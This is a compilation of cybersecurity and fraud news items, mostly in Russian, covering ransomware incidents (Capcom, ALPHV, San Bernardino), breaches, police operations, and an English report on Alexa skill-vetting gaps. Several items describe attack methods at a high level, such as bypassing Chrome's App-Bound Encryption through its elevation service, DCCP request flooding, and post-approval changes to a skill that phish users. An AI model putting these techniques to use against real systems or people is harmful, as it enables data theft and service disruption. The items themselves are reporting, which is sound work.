В Великобритании двое друзей купили лотерейный билет с украденной банковской карты и выиграли крупный приз в четыре миллиона фунтов (около 400 миллионов рублей). После победы товарищи решили отпраздновать крупный выигрыш и устроили четырехдневный запой, однако правоохранители раскрыли их обман, из-за чего мужчины попали в тюрьму, сообщает Daily Star.
Свой счастливый билет они приобрели в магазине в Лондоне, куда они приехали попрошайничать. Друзья были уверены, что в крупном городе можно получить больше денег.
После выигрыша один из приятелей позвонил в компанию, у которой они должны были получить приз, но когда у него попросили назвать банковские реквизиты для перевода денег он обмолвился, что у него нет счета. Это насторожило оператора, поскольку в таком случае вставал вопрос о том, как мужчина приобрел лотерейный билет.
Позвонивший ему на следующий день следователь выяснил, что карта принадлежит его бывшему другу, который «должен ему денег». Данную информацию подтвердить не удалось. В итоге выяснилось, что карта была украдена у совершенно другого человека, вследствие чего товарищей Марка Гудрама и Джона Уотсона арестовали и далее приговорили к 18 месяцам тюрьмы каждого.
• Source foto: <https://www.dailystar.co.uk/news/latest-news/fraudster-pals- four-day-bender-25722256>
В ноябре 2020 года стало известно, что японская корпорация Capcom пострадала от хакерской атаки, и взлом повлиял на бизнес-операции разработчика игр, включая работу системы электронной почты.
Атака произошла в начале ноября 2020 года и затронула некоторые сети Capcom Group, из-за чего в работе ряда систем возникли проблемы. Так, сбои произошли с уже упомянутой электронной почтой и доступом к файловым серверам, но не повлияли на доступность онлайн-игр и сайтов компании. Судя по всему, части корпоративной сети были отключены самими сотрудниками Capcom, чтобы предотвратить дальнейшее распространение угрозы.
Как выяснилось позже, компания была атакована шифровальщиком Ragnar Locker. В записке с требованием выкупа хакеры писали, что перед началом шифрования они похитили около 1 Тб файлов из корпоративных сетей Capcom в Японии, США и Канаде. Тогда сообщалось, что хакеры потребовали у компании выкуп в размере 11 000 000 долларов.
Изначально считалось, что во время инцидента пострадали около 350 000 человек, однако позже количество пострадавших уменьшилось до примерно 16 000 человек. Дело было в том, что некоторые логи оказались утрачены из-за атаки, и разобраться в произошедшем удалось не сразу.
Как теперь сообщает Capcom, восстановление затронутых атакой внутренних систем почти завершено, равно как и расследование инцидента.
Операторы Ragnar Locker получили доступ к внутренней сети Capcom, атаковав старый VPN-девайс для резервного копирования, расположенный в североамериканском филиале компании в Калифорнии. Оттуда злоумышленники проникли на устройства в офисах в США и Японии и 1 ноября 2020 года активировали шифровальщик.

Capcom заявляет, что когда злоумышленники проникли в сеть, компания как раз находилась в процессе усиления своей сетевой защиты. Скомпрометированное устройство VPN собирались отключить и заменить на более новую модель. Однако на фоне пандемии и перехода на удаленную работу, старый VPN-сервер продолжал функционировать и работать с задачами аварийного резервного копирования (на случай проблем со связью).
По окончательной оценке компании, от утечки данных пострадали 15 649 человек, то есть на 766 человек меньше, чем было было заявлено в январе 2021 года. Утекшая информация не включала данные платежных карт, лишь корпоративные и личную информацию, включая имена, адреса, номера телефонов и адреса электронной почты. Capcom в настоящее время уведомляет всех пострадавших.
Что касается выкупа, он не был выплачен, и производитель заявляет, что злоумышленники оставили в зашифрованных системах сообщение, в котором вообще не упоминалась конкретная сумма, и лишь была инструкции о том, как связаться с хакерами для начала переговоров.

После консультаций с правоохранительными органами, представители Capcom решили вообще не выходить на связь с операторами Ragnar Locker, и именно поэтому хакеры слили данные компании в сеть через несколько недель после взлома.
Источник: xakep.ru/2021/04/15/capcom-hack-2/
Профессор Дуглас Дж. Лейт (Douglas J. Leith) из дублинского Тринити-колледжа опубликовал научное исследование, посвященное сбору телеметрии в мобильных ОС. Оказалось, что компания Google собирает примерно в 20 раз больше телеметрии с устройств на базе Android, чем компания Apple с устройств на базе iOS.
Для сбора статистики и проведения анализа эксперт изучил трафик, исходящий от устройств iOS и Android на серверы Apple и Google на различных этапах работы девайса, например:
При этом в исследовании учтено, что данные могут собираться как самой операционной системой, так и приложениями по умолчанию, включая поисковики (Siri, OkGoogle), облачные хранилища (iCloud, Google Drive), карты и геолокационные сервисы (Apple Maps, Google Maps), хранилище фотографий (ApplePhoto, Google Photos). Разделив эту активность, Лейт сосредоточился именно на сборе данных ОС.
В итоге профессор пришел к выводу, что «и iOS, и Google Android собирают телеметрию, несмотря на то, что пользователь явно отказался от этой [опции]». Хуже того, «эти данные передаются компаниям, даже если пользователь не вошел в систему (даже если он никогда не входил в систему)».
Согласно документу, Apple склонна собирать больше типов данных со своих iOS- устройств, но Google собирает «заметно больший объем данных».
«В течение первых 10 минут после запуска смартфон Pixel отправляет в Google около 1 Мб данных, тогда как iPhone отправляет в Apple около 42 Кб данных.
Когда телефоны простаивают, Pixel отправляет примерно 1 Мб данных в Google каждые 12 часов по сравнению с iPhone, отправляющим 52 Кб в Apple. То есть Google собирает примерно в 20 раз больше данных с мобильных устройств, чем Apple», — пишет эксперт.Click to expand...
Сбор данных происходит каждые 264 секунды на неактивных устройствах Apple и один раз в 255 секунд на смартфонах Android (даже когда телефон не используется).
Также обе операционные системы обмениваются данными со своими серверами, когда пользователи просматривают экраны настроек, или когда в устройство вставляется новая SIM-карта.
Кроме того, профессор Лейт наблюдал за рядом предустановленных приложений и сервисов, которые тоже подключались к серверам Apple и Google (еще до того, как эти приложения были открыты и использованы):
«В частности, на iOS среди таких приложений Siri, Safari и iCloud, а на Google Android — приложения Youtube, Chrome, Google Docs, Safety hub, Google Messaging, Часы и панель Google Search».
Click to expand...
Столь обширная телеметрия может повлечь за собой как минимум две серьезные проблемы. Во-первых, ее можно использовать для привязки физических устройств к личным данным, которые обе компании, скорее всего, используют в рекламных целях. Во-вторых, процесс сбора телеметрии позволяет производителям отслеживать местоположение пользователей на основе их IP-адресов.
Издание The Record, равно как и сам профессор Тринити-колледжа, попросило представителей Apple и Google прокомментировать выводы, сделанные в научной работе. Компания Apple не ответила на запросы профессора и журналистов, а в Google Лейту пообещали обнародовать общедоступную документацию по собираемым данным, хотя не назвали точную дату, когда это произойдет. Журналистам же в Google ответили несколько иначе:
«В этом исследовании рассказывается о том, как работают смартфоны. Современные автомобили регулярно отправляют производителям основные данные о компонентах транспортного средства, состоянии их безопасности и графиках обслуживания, и мобильные телефоны работают аналогичным образом. В этом отчете подробно рассказывается о таких сообщениях, которые помогают гарантировать, что программное обеспечение iOS или Android обновлено, службы работают должным образом, а телефон безопасен и работает эффективно».
Click to expand...
Кроме того, производитель оспаривает саму методологию сбора данных. По мнению Google, в исследовании недооценивается объем телеметрии iOS, и исключаются определенные типы трафика, а это приводит к искажению результатов.
Источник: xakep.ru/2021/03/30/mobile-telemetry/
Для платформы Microsoft Teams, которая стала весьма популярна в нынешние времена повсеместной удаленной работы, запустили собственную программу bug bounty.
Microsoft предлагает исследователям искать баги в десктопном клиенте Teams в рамках своей программы Application Bounty Program, в которую в будущем добавят и другие приложения. Напомню, что за уязвимости в онлайн-сервисах Teams компании Microsoft платила и ранее.
В новой bug bounty исследователи могут заработать от 500 до 15 000 долларов за обычные уязвимости и от 6000 до 30 000 долларов, если они продемонстрируют эксплоит, соответствующий одному из пяти конкретных сценариев.
Например, награда до 30 000 долларов присуждается за удаленное выполнение кода без взаимодействия с пользователем, а 15 000 долларов можно получить, добравшись до учетных данных пользователей, не применяя для этого фишинговые атаки. На иллюстрации ниже видно, что также высоко ценятся различные XSS- уязвимости и эскалация привилегий.

Источник: xakep.ru/2021/03/26/microsoft-teams-bug-bounty/
Специалисты компании Akamai заметили, что злоумышленники злоупотребляют малоизвестным сетевым протоколом DCCP (Datagram Congestion Control Protocol) для DDoS-атак. Данный интернет-стандарт был утвержден в 2007 году и помогает отслеживать перегрузки в сети для коммуникаций на основе UDP. DCCP особенно эффективен для приложений, где пришедшие невовремя данные, становятся бесполезными. Например, потоковое вещание, онлайн-игры и интернет-телефония.
Хоть протокол включает в себя множество функций, Akamai сообщает, что хакеры злоупотребляют трехсторонним рукопожатием, которое происходит в начале соединения DCCP+UDP. Таким образом злоумышленники могут отправить поток пакетов DCCP-Request на 33 порт сервера (где работает протокол DCCP), тем самым заставив сервер тратить важные ресурсы на инициирование многосторонних трехсторонних рукопожатий, которые не будут завершены, а в конечном итоге выведут сервер из строя (в силу нехватки доступных ресурсов).

Такая атака похожа на TCP SYN-флуд, хорошо известный тип DDoS-атак, который более десяти лет используется аналогичным образом.
«По сути, эти пакеты представляют собой SYN-флуд в версии для протокола DCCP», — объясняет Чад Симан (Chad Seaman), руководитель группы Akamai SIRT.
Click to expand...
Специалист подчеркивает, что даже если трехстороннее рукопожатие DCCP завершено, а сервер «пережил» флуд пакетами, злоумышленники все равно могут злоупотребить спуфингом пакетов UDP и попросту использовать открытые порты DCCP-сервера для отражения и усиления атак на сторонние сервисы.
К счастью, несмотря на то, что протокол существует уже почти 14 лет, очень немногие разработчики ОС и приложений позаботились о его поддержке. Так, некоторые дистрибутивы Linux поставляются с поддержкой DCCP, но далеко не все дистрибутивы Linux поставляются с включенными сокетами DCCP «из коробки». Windows-системы, похоже, вообще не поддерживают данный протокол, что объясняет нежелание некоторых производителей приложений добавлять его в свое ПО.
«Пытаясь определить варианты использования в реальном мире, мы не смогли найти ни одного приложения, которое действительно использует этот протокол», — говорит Симан.
Click to expand...
То есть в Akamai считают, что пока большого вреда от подобных атак можно не ждать. Однако ситуация может измениться, если протокол станет более популярен будущем, ведь потоковая передача в реальном времени становится все более распространенной. В итоге Симан рекомендует на всякий случай блокировать весь трафик порта 33, особенно в инфраструктуре, где DCCP не используется, но поддерживается.
Источник: xakep.ru/2021/03/24/dccp-ddos/
Разработчики Apache Software Foundation устранили уязвимость в Apache OFBiz, которая могла позволить неаутентифицированному злоумышленнику удаленно захватить контроль над уязвимой опенсорсной ERP-системой (Enterprise Resource Planning, планирование ресурсов предприятия).
OFBiz представляет собой платформу на основе Java, предназначенную для автоматизации корпоративных различных процессов. Платформа предлагает широкий спектр функций, включая, к примеру, бухгалтерский учет, управление взаимоотношениями с клиентами, управление производственными операциями, управление заказами, контроль цепочки поставок и систему управления складом.
Уязвимость получила идентификатор CVE-2021-26295 и затрагивает все версии OFBiz вплоть до 17.12.06. Проблема связана с небезопасной десериализацией и позволяет неавторизованным удаленным злоумышленникам напрямую выполнять произвольный код на сервере.
Разработчики пояснили, что атакующий может изменить сериализованные данные, внедрив в них произвольный код, в итоге при десериализации это может привести к удаленному выполнению данного кода. То есть баг может использоваться полного захвата контроля над Apache OFBiz.
Источник: xakep.ru/2021/03/22/apache-ofbiz-bug/
Популярная торговая платформа коллекционных токенов (NFT) Nifty Gateway сообщила, что некоторые пользователи столкнулись с «захватом аккаунтов», кражей и покупкой NFT с кредитной карты без их ведома.
Согласно заявлению Nifty Gateway, популярного рынка незаменяемых токенов, небольшая группа пользователей платформы столкнулась с «захватом аккаунтов». Жертвы утверждали, что у них либо были украдены NFT, либо NFT были куплены с использованием данных кредитной карты, а затем украдены.
Один пользователь утверждает, что потерял NFT на сумму более $150 000. Другой пользователь заявляет, что кто-то использовал данные его кредитной карты для покупки NFT стоимостью более $10 000, а его ранее купленные NFT были украдены. В своем заявлении Nifty Gateway отмечает:
«Мы продолжаем анализ ситуации, но наша первоначальная оценка показывает, что число столкнувшихся с проблемами пользователей небольшое, ни в одной из затронутых учетных записей не была включена двухфакторная аутентификация, и доступ был получен с использованием действительных учетных данных».
Двухфакторная аутентификация (2FA) в настоящее время не обязательна на Nifty Gateway, но это может измениться. Соучредитель Nifty Gateway Гриффин Кок Фостер (Griffin Cock Foster) написал в социальной сети Twitter:
«Несколько пользователей стали мишенью злоумышленников, их пароли были скомпрометированы. Убедитесь, что у вас включена 2FA – это предотвратит подобные ситуации в будущем. Мы активно изучаем возможность введения обязательной двухфакторной аутентификации для всех, кто совершил покупку».
Отметим, что популярность NFT резко возросла в последние месяцы.
• Source:
__https://twitter.com/x/status/1371479363036778503
• Source:
__https://twitter.com/x/status/1371347900748460034
• Source:
__https://twitter.com/x/status/1371199359996456960
• Source:
Киберпреступные группы, специализирующиеся на краже корпоративных данных и требовании выкупа за то, чтобы они не публиковались, испробовали бесчисленное количество способов пристыдить своих жертв и заставить их заплатить. Последнее нововведение в разжигании жары исходит от группы вымогателей ALPHV/BlackCat, которая традиционно публикует любые украденные данные жертв в даркнете. Однако сегодня группа начала публиковать в общедоступном Интернете веб-сайты отдельных жертв, а просочившиеся данные были доступны в удобной для поиска форме.
Сайт ALPHV утверждает, что заботится о конфиденциальности людей, но позволяет любому просматривать конфиденциальные украденные данные.
ALPHV недавно объявила на своем веб-сайте, посвященном позору и вымогательству жертв, о том, что она взломала роскошный спа-салон и курорт на западе Соединенных Штатов. Где-то за последние 24 часа ALPHV опубликовал сайт с тем же именем жертвы в домене и их логотипом на главной странице.
На веб-сайте утверждается, что указана личная информация 1500 сотрудников курорта и более 2500 жителей объекта. Вверху страницы две кнопки «Проверить себя», одна для сотрудников, другая для гостей.
Бретт Кэллоу, аналитик угроз из охранной фирмы Emsisoft, назвал действия ALPHV «хитрой тактикой», которая наверняка обеспокоит других их жертв.
Кэллоу сказал, что большинство блогов, посрамляющих жертв, поддерживаемых основными группами вымогателей и вымогателей данных, существуют на малоизвестных, медленно загружаемых сайтах в Даркнете, доступных только с помощью стороннего программного обеспечения, такого как Tor. Но веб-сайт, созданный ALPHV в рамках этой новой тактики давления, доступен в открытом Интернете.
«Компании, вероятно, будут больше обеспокоены перспективой того, что их данные будут переданы таким образом, чем просто размещением на малоизвестном сайте Tor, URL-адрес которого почти никто не знает», — сказал Кэллоу. «Это разозлит людей и сделает групповые действия более вероятными».
Неясно, планирует ли ALPHV применять этот подход к каждой жертве, но другие недавние жертвы преступной группировки включают школьный округ и город США. Скорее всего, это тестовый прогон, чтобы посмотреть, улучшит ли он результаты.
«Мы не собираемся останавливаться, наш отдел распространения утечек сделает все возможное, чтобы похоронить ваш бизнес», — говорится на сайте жертвы. «На данный момент у вас еще есть шанс сохранить безопасность и репутацию вашего отеля. Мы настоятельно рекомендуем вам проявлять инициативу в ваших переговорах; у тебя мало времени».
Появившись в ноябре 2021 года, ALPHV, пожалуй, наиболее примечателен своим языком программирования (он написан на Rust). ALPHV активно набирает операторов из нескольких организаций-вымогателей, включая REvil, BlackMatter и DarkSide, предлагая партнерам до 90% любого выкупа, уплаченного организацией- жертвой.
Многие эксперты по безопасности считают, что ALPHV/BlackCat — это просто ребрендинг другой группы вымогателей — «Darkside», также известной как «BlackMatter», той же банды, которая ответственна за атаку на Colonial Pipeline в 2021 году, вызвавшую нехватку топлива и скачки цен в течение нескольких дней прошлым летом.
Кэллоу сказал, что у этого новшества ALPHV может быть и положительная сторона, отметив, что его жена недавно получила известие непосредственно от другой группы вымогателей — Cl0p.
«С положительной стороны, подобные трюки означают, что люди могут узнать, что их личные данные были скомпрометированы», — сказал он. «Cl0p отправил письмо моей жене в прошлом году. Компания, которая потеряла ее данные, до сих пор не обнародовала информацию и не уведомила пострадавших людей (по крайней мере, она ничего не слышала от компании)».
Компания Fujitsu временно отключила свою SaaS-платформу ProjectWEB, так как хакеры смогли получить доступ к системам и похитили файлы, принадлежащие нескольким правительственным организациям Японии. Платформа ProjectWEB позволяет компаниям и организациям обмениваться внутренней информацией, например, с руководителями проектов и другими заинтересованными сторонами.
Сообщается, что от утечки пострадали Министерство земли, инфраструктуры, транспорта и туризма, Министерство иностранных дел, Секретариат Кабинета министров, а также аэропорт Нарита.
По информации Национального центра готовности к чрезвычайным ситуациям и стратегии в области кибербезопасности (NISC), который занимается расследованием случившегося, атака на Fujitsu была обнаружена в понедельник, 24 мая 2021 года. День спустя работа ProjectWEB была приостановлена для исследования «масштабов и причин» взлома, по требованию следователей NISC.
Местные СМИ сообщают, что неизвестные злоумышленники похитили документы, содержащие более 76 000 email-адресов сотрудников и подрядчиков Министерства земли, инфраструктуры, транспорта и туризма, что уже подтвердили в ведомстве.
Также японская пресса пишет, что от атаки пострадал и международный аэропорт Нарита, расположенный недалеко от Токио: хакерам якобы удалось похитить данные, связанные с управлением воздушным движением, расписания рейсов и информацию о бизнес-операциях.
Пока о деталях и целях этой атаки ничего практически неизвестно. Неясно даже, как именно произошел взлом (из-за какой-то ошибки, за счет использования уязвимости или это была целевая атака на цепочку поставок). В Fujitsu сообщают, что больше информации появится после завершения расследования.
Источник: xakep.ru/2021/05/28/projectweb-leak/
ИБ-эксперт Александр Хагена (Alexander Hagenah) опубликовал в открытом доступе инструмент Chrome-App-Bound-Encryption-Decryption для обхода новой защитной функции App-Bound Encryption в Chrome, которая предназначена для защиты конфиденциальных данных, включая файлы cookie.
Напомним, что функция App-Bound Encryption была [представлена](https://security.googleblog.com/2024/07/improving-security-of- chrome-cookies-on.html) минувшим летом, с релизом Chrome 127. Как рассказывали разработчики браузера, она предназначается для шифрования файлов cookie и сохраненных паролей с помощью службы Windows, которая работает с системными привилегиями. То есть это не дает вредоносным программам, работающим с правами залогиненного пользователя, похитить секреты, хранящиеся в Chrome. Ведь в теории для обхода такой защиты малвари понадобятся системные привилегии, а получить их незаметно не получится.
После того как в сети [заговорили](https://xakep.ru/2024/09/25/app-bound- encryption-bypass/) о том, что малварь научилась обходить App-Bound Encryption, представители Google сообщили СМИ, что это было ожидаемо. В компании не рассчитывали создать «пуленепробиваемую» защиту, и шифрование App- Bound должно было лишь заложить основу для постепенного создания более надежной системы.
«Нам известно о том, что новая защита вызвала переполох среди разработчиков инфостилеров. Как мы уже писали в блоге, мы ожидаем, что эта защита изменит поведение злоумышленников в сторону более заметных методов атак, включая инъекции и скрапинг памяти. Именно это мы и наблюдаем теперь», — сообщали тогда в Google.
Click to expand...
Теперь, когда Хагена открыто представил свое решение для обхода App-Bound Encryption [на GitHub](https://github.com/xaitax/Chrome-App-Bound-Encryption- Decryption), любой желающий может изучить и скомпилировать этот инструмент.
«Этот инструмент расшифровывает ключи App-Bound Encryption, хранящиеся в файле Local State Chrome, используя внутреннюю службу Chrome IElevator на базе COM, — говорится в описании проекта. — Инструмент позволяет извлечь и расшифровать ключи, которые Chrome защищает с помощью App-Bound Encryption, чтобы предотвратить доступ к защищенным данным, таким как cookie, пароли и платежные данные».
Как сообщает издание Bleeping Computer, со ссылкой на ИБ-специалиста, известного под ником g0njxa, инструмент Хагены использует базовый метод обхода App-Bound Encryption, который большинство инфостилеров уже превзошли. Однако этот метод по-прежнему работает, так как разработчики Chrome еще не выпустили патчи.
Эту информацию подтверждают и аналитики из компании eSentire, по словам которых, метод Хагены похож на ранние способы обхода защиты, которые использовали злоумышленники, когда App-Bound Encryption только представили.
«[Стилер] Lumma использовал этот метод — инстанцирование интерфейса Chrome IElevator посредством COM для доступа к Chrome Elevation Service для расшифровки cookies, но это довольно "шумно" и легко обнаруживается. Теперь [хакеры] используют непрямую расшифровку, не взаимодействуя непосредственно с Chrome Elevation Service», — рассказывают в eSentire.
Click to expand...
Разработчики Google сообщили изданию, что не видят ничего страшного в релизе такого инструмента. Так как для его работы требуются прав администратора, в компании считают, что «успешно повысили уровень доступа, необходимый для эффективных атак такого типа».
© https://xakep.ru/2024/10/29/chrome-app-bound-encryption-decryption/
Психологическое давление на сотрудников казино помогло хакерам добиться своей цели.
Согласно новым данным команды анализа угроз и реагирования на инциденты Microsoft, за рядом атак на компании в сфере развлечений Лас-Вегаса стоит хакерская группа, состоящая в основном из молодых людей. Группировка (Octo Tempest, 0ktapus, Scattered Spider, UNC3944) применяла не только техники социальной инженерии, но и угрозы насилия, чтобы выманить учетные данные своих жертв.
Главной мишенью хакеров становятся технические специалисты службы поддержки, к которым они применяют методы социальной инженерии, чтобы добыть необходимую для взлома информацию. Однако, в ряде случаев группа прибегла к более радикальным методам, в том числе угрожая насилием в отношении родственников жертв.
Пример угроз в адрес жертв
Исследования показали, что большинство участников этой группы – это носители английского языка в возрасте до 20 лет. Активность злоумышленников особенно усилилась с 2022 года, когда они стали активно заниматься перехватом SIM-карт (SIM Swapping, SIM свопинг) и захватом аккаунтов с целью кражи криптовалют.
Киберпреступная группировка привлекла к себе внимание благодаря ряду успешных атак на такие компании, как Caesars Entertainment и MGM Resorts . Атаки привели к огромным финансовым убыткам: казино Caesars Palace, по неподтверждённым данным, заплатило вымогателям около $15 млн., в то время как убытки MGM превысили $100 млн.
Однако это лишь верхушка айсберга. Помимо курортов Лас-Вегаса, группе приписывают атаки на такие крупные корпорации, как Okta, Microsoft, Nvidia, Rockstar и Samsung. Эксперт по кибербезопасности, который предпочел остаться анонимным, заявил, что отрасль кибербезопасности допустила ошибку, недооценив молодых и талантливых хакеров.
Исследователи из Microsoft предупреждают о возможной коллаборации Com с другими, более опытными преступными группами, что может привести к еще более масштабным и сложным атакам в будущем.
source: microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses- boundaries-to-facilitate-extortion-encryption-and-destruction/
Округ Сан-Бернардино заплатил выкуп в размере 1,1 миллиона долларов хакерам, проникшим в компьютеры департамента шерифа, признали чиновники.
В прошлом месяце департамент признал, что в результате взлома многие его файлы были зашифрованы, что нарушило работу систем и заблокировало доступ к данным.
Представители округа сообщили ABC News в пятницу, что округ застрахован на случай подобных атак и что его доля выкупа составила чуть более $511 000.
После переговоров с хакерами страховая компания и округ согласились заплатить, чтобы восстановить работоспособность системы и защитить данные.
"Решение о выплате было предметом тщательного рассмотрения", - заявили в округе.
Округ узнал об атаке 7 апреля и начал принимать меры по отключению систем, защите сети и разработке альтернативных решений для доступа к данным. Например, патрульные подразделения должны были связаться по радио, чтобы проверить номерные знаки или получить справочную информацию о подозреваемом, вместо того чтобы использовать компьютеры в своих автомобилях.
Власти считают, что хакеры, скорее всего, получили доступ к системе после того, как кто-то на компьютере в округе перешел по вредоносной ссылке.
Эксперты говорят, что такие атаки становятся все более распространенными.
"Цена довольно жестокая, не только финансовая, но в случае с правоохранительными органами - это ведомство, люди, которым они служат", - сказал Вивек Бхандари из Tanium, организации, которая помогает организациям обеспечивать безопасность своих систем. "В больницах иногда это может повлиять на уход за пациентами, и мы это видели".
К сожалению, говорит он, когда организации решают заплатить выкуп, среди хакеров распространяются слухи, и другие могут попытаться снова атаковать ту же организацию.
Бхандари говорит, что для обеспечения кибербезопасности необходимо обращать пристальное внимание на то, что нажимается в электронном письме.
"Фишинговые атаки - очень распространенный способ проникновения злоумышленников. Вы заставляете пользователя открыть файл, потому что, эй, вот фотография вашего ребенка или фотография с совещания на прошлой неделе. Что- то, что заставит человека открыть вложение или перейти по ссылке, является распространенной техникой", - сказал Бхандари.
Источники:
Sheriff's Department systems ](https://abc7.com/san-bernardino-cyberattack- ransom-paid-hackers/13215833/)
The hackers encrypted San Bernardino County Sheriff's Department data, causing significant disruptions to operations.
abc7.com
Правоохранители также изъяли почти $130 млн
️Полицейские
задержали около 1 тыс. человек в ходе крупной операции Интерпола по борьбе с
онлайн-мошенничеством в 30 странах мира. Об этом сообщила журналистам в
четверг пресс-служба Международной организации уголовной полиции (Интерпол).
«Отделы борьбы с мошенничеством ряда стран работали вместе с 28 июня по 23 ноября, - говорится в сообщении. - Задержано около 1 тыс. человек, изъято почти $130 млн».
По данным Интерпола, в ходе операции раскрыто около 1,6 тыс. преступлений. Злоумышленники использовали различные методы хищения денег, в том числе "выдавали себя за других людей", "совершали мошенничества в сфере инвестиций" и "вводили в заблуждение пользователей сайтов знакомств".
Операция проводилась в 30 странах, включая Австралию, Францию, Индию, Южную Корею, Польшу, Румынию, Великобританию и США.
INTERPOL police operation ](https://www.interpol.int/News-and- Events/News/2022/Cyber-enabled-financial-crime-USD-130-million-intercepted-in- global-INTERPOL-police-operation)
Operation HAECHI III cracks down on voice phishing, romance scams, sextortion, investment fraud, business email compromise and money laundering associated with illegal online gambling
www.interpol.int
https://www.bleepingcomputer[.]com/...ed-130-million-from-cybercriminals- worldwide/
«Сотрудниками Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России совместно с коллегами из Москвы, Ростовской области и Краснодарского края пресечена противоправная деятельность группы хакеров.
По имеющимся данным, злоумышленники осуществили незаконное копирование и распространение охраняемых законом сведений, составляющих коммерческую тайну одной из крупнейших российских IT-компаний.
Соучастники получили неправомерный доступ к базе организации, скопировали свыше 600 тысяч записей, содержащих персональные данные работников сервисной службы, а затем с целью продажи разместили их в теневом сегменте Интернета.
В городах Ростове-на-Дону и Сочи полицейские задержали двоих подозреваемых. По адресам их проживания изъяты компьютерные системные блоки, внешние электронные носители информации, мобильные телефоны и сим-карты, а также другие предметы, имеющие доказательственное значение.
По собранным оперативниками материалам следователем СУ по ЦАО ГСУ СК России по г. Москве возбуждены уголовные дела по признакам преступлений, предусмотренных статьями 272 и 183 УК РФ. В соответствии с ролью каждого фигурантам предъявлены обвинения и избрана мера пресечения в виде подписки о невыезде и надлежащем поведении»
Следственным управлением УСК по Гомельской области завершено расследование многоэпизодного уголовного дела о мошенничестве, возбужденного в отношении молодой супружеской пары из Минского района. Потерпевшими признаны 162 человека, проживающие во всех областях Беларуси, сообщила официальный представитель УСК по Гомельской области Мария Кривоногова.
По данным УСК, с октября 2018 года по сентябрь 2019 года супруги создали в социальных сетях несколько фиктивных аккаунтов по продаже одежды, обуви, аксессуаров, посуды и других предметов. "Они размещали в ленте рекламные фотографии товаров, скопированные с реальных торговых площадок, и указывали заниженные цены. В ходе переписки с потенциальными покупателями фигуранты просили предоплату в размере от 50 до 100% от стоимости товара, указывали расчетные счета для перевода денег и после получения скриншотов совершенных операций обещали выслать товар по почте", - рассказали в УСК.
Потенциальные покупатели переводили деньги и ожидали заказанный товар. Супруги по очереди переписывались с клиентами, ссылаясь на различные отговорки. Затем обвиняемые блокировали самых настойчивых и разъяренных покупателей, удаляли свои аккаунты и создавали новые.
Обманутые граждане из различных регионов страны стали обращаться в милицию. В числе потерпевших и жители Гомельской области. "Для эффективного расследования возбужденных уголовных дел все материалы, связанные с противоправной деятельностью жителей Минщины, были аккумулированы в следственном управлении УСК по Гомельской области. Следователем проведена скрупулезная работа не только по сбору доказательств фактов противоправной деятельности, указанных заявителями, но и установлению иных эпизодов. Непосредственно сотрудником СК установлено более 100 граждан, пострадавших от мошеннических действий обвиняемых", - отметила Мария Кривоногова.
По данным следствия, в указанный период супруги завладели свыше Br5,9 тыс. Кроме того, с октября 2019 года по ноябрь 2020 года обвиняемая по указанной схеме завладела еще Br2,2 тыс.
На основании собранных по делу доказательств жителям Минского района предъявлено обвинение по ч.2 ст.209 (мошенничество, совершенное группой лиц) УК Беларуси. В отношении обвиняемых избрана мера пресечения в виде личного поручительства.
Уголовное дело передано в прокуратуру для дальнейшего направления в суд.
Researchers have uncovered gaps in Amazon's skill vetting process for the Alexa voice assistant ecosystem that could allow a malicious actor to publish a deceptive skill under any arbitrary developer name and even make backend code changes after approval to trick users into giving up sensitive information.
The findings were presented on Wednesday at the Network and Distributed System Security Symposium (NDSS) conference by a group of academics from Ruhr- Universität Bochum and the North Carolina State University, who analyzed 90,194 skills available in seven countries, including the US, the UK, Australia, Canada, Germany, Japan, and France.
Amazon Alexa allows third-party developers to create additional functionality for devices such as Echo smart speakers by configuring "skills" that run on top of the voice assistant, thereby making it easy for users to initiate a conversation with the skill and complete a specific task.
Chief among the findings is the concern that a user can activate a wrong skill, which can have severe consequences if the skill that's triggered is designed with an insidious intent.
The pitfall stems from the fact that multiple skills can have the same invocation phrase.
Indeed, the practice is so prevalent that the investigation spotted 9,948 skills that share the same invocation name with at least one other skill in the US store alone. Across all the seven skill stores, only 36,055 skills had a unique invocation name.
[](https://thehackernews.com/images/-Eky2clW4BIo/YDi2PAxyNRI/AAAAAAAAB40/dGmQlzouJ4c95W803fOmj4Nr_V0xl0HvwCLcBGAsYHQ/s0/amazon-
skills.jpg)
Given that the actual criteria Amazon uses to auto-enable a specific skill
among several skills with the same invocation names remain unknown, the
researchers cautioned it's possible to activate the wrong skill and that an
adversary can get away with publishing skills using well-known company names.
"This primarily happens because Amazon currently does not employ any automated approach to detect infringements for the use of third-party trademarks, and depends on manual vetting to catch such malevolent attempts which are prone to human error," the researchers [explained](https://www.ndss-symposium.org/wp- content/uploads/ndss2021_5A-1_23111_paper.pdf). "As a result users might become exposed to phishing attacks launched by an attacker."
Even worse, an attacker can make code changes following a skill's approval to
coax a user into revealing sensitive information like phone numbers and
addresses by triggering a dormant intent.
In a way, this is analogous to a technique called versioning that's used to
bypass verification defences. Versioning refers to submitting a benign version
of an app to the Android or iOS app store to build trust among users, only to
replace the codebase over time with additional malicious functionality through
updates at a later date.
To test this out, the researchers built a trip planner skill that allows a user to create a trip itinerary that was subsequently tweaked after initial vetting to "inquire the user for his/her phone number so that the skill could directly text (SMS) the trip itinerary," thus deceiving the individual into revealing his (or her) personal information.
[](https://thehackernews.com/images/-arjZOaMwiac/YDi3T3p06MI/AAAAAAAAB5E/RdmAkXG9yG83tNAiN6eFmY2lptFSo_bHQCLcBGAsYHQ/s0/amazon-
skills.jpg)
Furthermore, the study found that the [permission
model](https://developer.amazon.com/en-US/docs/alexa/custom-skills/configure-
permissions-for-customer-information-in-your-skill.html) Amazon uses to
protect sensitive Alexa data can be circumvented. This means that an attacker
can directly request data (e.g., phone numbers, Amazon Pay details, etc.) from
the user that are originally designed to be cordoned by permission APIs.
The idea is that while skills [requesting for sensitive data](https://developer.amazon.com/en-US/docs/alexa/custom-skills/request- customer-contact-information-for-use-in-your-skill.html) must invoke the permission APIs, it doesn't stop a rogue developer from asking for that information straight from the user.
The researchers said they identified 358 such skills capable of requesting information that should be ideally secured by the API.
[](https://thehackernews.com/images/-UuIIQ72FQk4/YDi2xKzYU5I/AAAAAAAAB48/IgMsRk3AP281jepu3wk_K6l4EjbxXpb0gCLcBGAsYHQ/s0/amazon-
skills.jpg)
Lastly, in an analysis of privacy policies across different categories, it was
found that only 24.2% of all skills provide a privacy policy link, and that
around 23.3% of such skills do not fully disclose the data types associated
with the permissions requested.
